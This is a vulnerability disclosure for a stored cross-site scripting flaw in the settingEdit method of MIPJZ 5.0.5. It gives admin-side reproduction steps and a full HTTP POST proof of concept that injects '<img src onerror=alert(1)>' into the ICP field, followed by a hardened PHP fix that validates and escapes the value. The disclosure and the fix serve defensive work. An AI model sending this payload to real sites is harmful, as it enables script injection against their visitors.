mipjz
There is a stored cross-site scripting (XSS) vulnerability in MIPJZ v5.0.5
Vulnerability product: mipjz
Vulnerability version: 5.0.5
Source code link: https://github.com/sansanyun/mipjz/archive/refs/heads/master.zip
Vulnerability type: Stored XSS
Vulnerability details:
In the settingEdit method of the mipjz\app\setting\controller\ApiAdminSetting.php file, all submitted values are assigned to $settingInfo as-is, and the value of the ICP parameter in particular is not filtered.
Vulnerability location: mipjz\app\setting\controller\ApiAdminSetting.php#settingEdit method
Vulnerability reproduction:
Requires back-end administrator privileges.
Open: http://192.168.0.105:82/index.php?s=/admin/#/setting/setting/
Insert <img src onerror=alert(1)> into the ICP filing number field and click "Save now".
Open again: http://192.168.0.105:82
An alert pop-up appears.
POC:
POST /index.php?s=/setting/ApiAdminSetting/settingEdit HTTP/1.1
Host: mipjz.com:82
Content-Length: 1904
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
dataId:
Content-Type: application/json;charset=UTF-8
Origin: http://mipjz.com:82
Referer: http://mipjz.com:82/index.php?s=/admin/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=84a79679dc650a2da1270dfa0aed683d;
Connection: close
{"setting":"{\"siteName\":\"MIP建站系统\",\"keywords\":\"\",\"description\":\"\",\"template\":\"default\",\"domain\":\"\",\"uploadPath\":\"\",\"uploadUrl\":\"uploads\",\"statistical\":\"\",\"icp\":\"<img src onerror=alert(1)>\",\"systemStatus\":true,\"systemType\":\"cms\",\"idStatus\":false,\"mipDomain\":\"\",\"articleModelName\":\"文章\",\"loginStatus\":true,\"registerStatus\":false,\"articleModelUrl\":\"article\",\"askModelName\":\"问答\",\"askModelUrl\":\"ask\",\"userModelName\":\"用户\",\"userModelUrl\":\"user\",\"codeCompression\":false,\"indexTitle\":\"\",\"baiduSpider\":true,\"baiduMip\":\"1\",\"localCurrentVersionNum\":\"500\",\"localCurrentVersion\":\"v5.0.0\",\"titleSeparator\":\"_\",\"pcStatistical\":\"\",\"httpType\":\"http://\",\"mipApiAddress\":\"\",\"articlePages\":false,\"tagModelName\":\"标签\",\"tagModelUrl\":\"tag\",\"loginCaptcha\":true,\"registerCaptcha\":\"1\",\"biaduZn\":\"12775452642328057043\",\"articleStatus\":\"1\",\"askStatus\":\"\",\"aritcleLevelRemove\":false,\"askLevelRemove\":\"\",\"articleDomain\":\"\",\"askDomain\":\"\",\"superSites\":false,\"rewrite\":false,\"topDomain\":\"\",\"superTpl\":false,\"diyUrlStatus\":false,\"urlApiAddress\":null,\"mipPostStatus\":false,\"mipTemplate\":\"default\",\"articlePagesNum\":\"1000\",\"urlPageBreak\":\"_\",\"urlCategory\":false,\"baiduSearchPcUrl\":\"/baiduSitemapPc.xml\",\"baiduSearchMUrl\":\"http:///baiduSitemapMobile.xml\",\"baiduYuanChuangUrl\":\"\",\"baiduTimePcUrl\":\"\",\"baiduTimeMUrl\":null,\"publishTime\":null,\"baiduYuanChuangStatus\":false,\"baiduTimePcStatus\":false,\"baiduTimeMStatus\":false,\"guanfanghaoStatus\":false,\"guanfanghaoUrl\":\"\",\"guanfanghaoStatusPost\":false,\"guanfanghaoCambrian\":\"<mip-cambrian site-id=\\\"官方号ID\\\"></mip-cambrian>\\n\",\"guanfanghaoRealtimeUrl\":\"\",\"topStatus\":null,\"productModelUrl\":\"product\",\"productModelName\":\"产品\"}"}
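A hardened counterpart of the settingEdit handling described in the details above, as an added example that is not mipjz's code; it assumes the nested JSON shape shown in the POC body (a "setting" key holding a JSON string) and uses hypothetical function names:

```php
<?php
// Added example, not mipjz's own code. It mirrors the settingEdit flow from
// the advisory: the "setting" value is a JSON string (as in the POC), and the
// fix is to validate icp before it is stored and escape it when it is rendered.
declare(strict_types=1);

// Accept only what an ICP filing number can contain: CJK characters, ASCII
// letters and digits, "-" and spaces (e.g. 京ICP备12345678号-1, a constructed
// sample). "<", ">", quotes and "=" are rejected, so no tag or handler survives.
function validateIcp(string $icp): string
{
    $icp = trim($icp);
    if ($icp === '') {
        return '';                                   // the field is optional
    }
    if (mb_strlen($icp, 'UTF-8') > 40) {
        throw new InvalidArgumentException('ICP value too long');
    }
    if (!preg_match('/^[\p{Han}A-Za-z0-9\- ]+$/u', $icp)) {
        throw new InvalidArgumentException('ICP value contains disallowed characters');
    }
    return $icp;
}

// Second line of defence: escape the stored value wherever a template prints
// it, so a value that reached the database still cannot execute in the browser.
function renderSetting(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened settingEdit: decode the nested JSON, validate icp, and return the
// array that would be persisted (persistence itself is outside this example).
function settingEditHardened(string $settingJson): array
{
    $settingInfo = json_decode($settingJson, true, 512, JSON_THROW_ON_ERROR);
    $settingInfo['icp'] = validateIcp((string) ($settingInfo['icp'] ?? ''));
    return $settingInfo;
}

// Constructed inputs: the POC payload is rejected, a real filing number passes.
try {
    settingEditHardened('{"siteName":"demo","icp":"<img src onerror=alert(1)>"}');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
$ok = settingEditHardened('{"siteName":"demo","icp":"京ICP备12345678号-1"}');
echo renderSetting($ok['icp']), PHP_EOL;
```

Validation on input and escaping on output are independent controls; keeping both means a bypass of the allowlist still lands in an escaped template rather than in the DOM.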